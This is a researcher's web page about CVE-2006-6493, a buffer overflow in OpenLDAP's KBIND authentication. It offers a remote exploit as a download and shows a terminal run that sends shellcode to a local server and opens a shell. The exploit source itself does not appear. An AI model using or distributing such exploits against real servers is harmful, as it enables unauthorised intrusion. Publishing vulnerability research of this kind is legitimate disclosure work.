Security Research

by Alexander Sotirov

Navigation

Resources

Latest posts

• Assured Exploitation 2011
• You Should Work for Symantec
• CSAW final challenge
• CSAW reversing challenge
• Darknet design

Archives

• 2011 | 2010 | 2009 | 2008

Follow

• Twitter
• Blog feed

Contact

• alex@sotirov.net
• PGP key

Meet me at

• CanSecWest

  Vancouver, Mar 9-11

• Infiltrate

  Miami Beach, Apr 16-17

OpenLDAP KBIND authentication buffer overflow exploit

CVE-2006-6493

This is a remote exploit for a buffer overflow in the Kerberos KBIND authentication code in the OpenLDAP slapd server. The vulnerable code is enabled only when OpenLDAP is compiled with the --enable-kbind option, which has been disabled by default since version 2.0.2 and was removed from the configure script in the 2.1 release. The chance of finding a real system that is still vulnerable is minimal.

Details about the vulnerability are available in the advisory.

Downloads

• openldap-kbind-p00f.c (PGP .sig)

Screenshot

$ ./openldap-kbind-p00f.exe 127.0.0.1 cn=Manager,dc=my-domain,dc=com
: openldap-kbind-p00f.c - OpenLDAP kbind remote exploit

: Only works on servers compiled with
    --enable-kbind    enable LDAPv2+ Kerberos IV bind (deprecated) [no]

: by Solar Eclipse <solareclipse@phreedom.org>

Sending shellcode
Reading bind result
Spawning shell...
uid=439(ldap) gid=439(ldap) groups=439(ldap)
ldap@localhost / $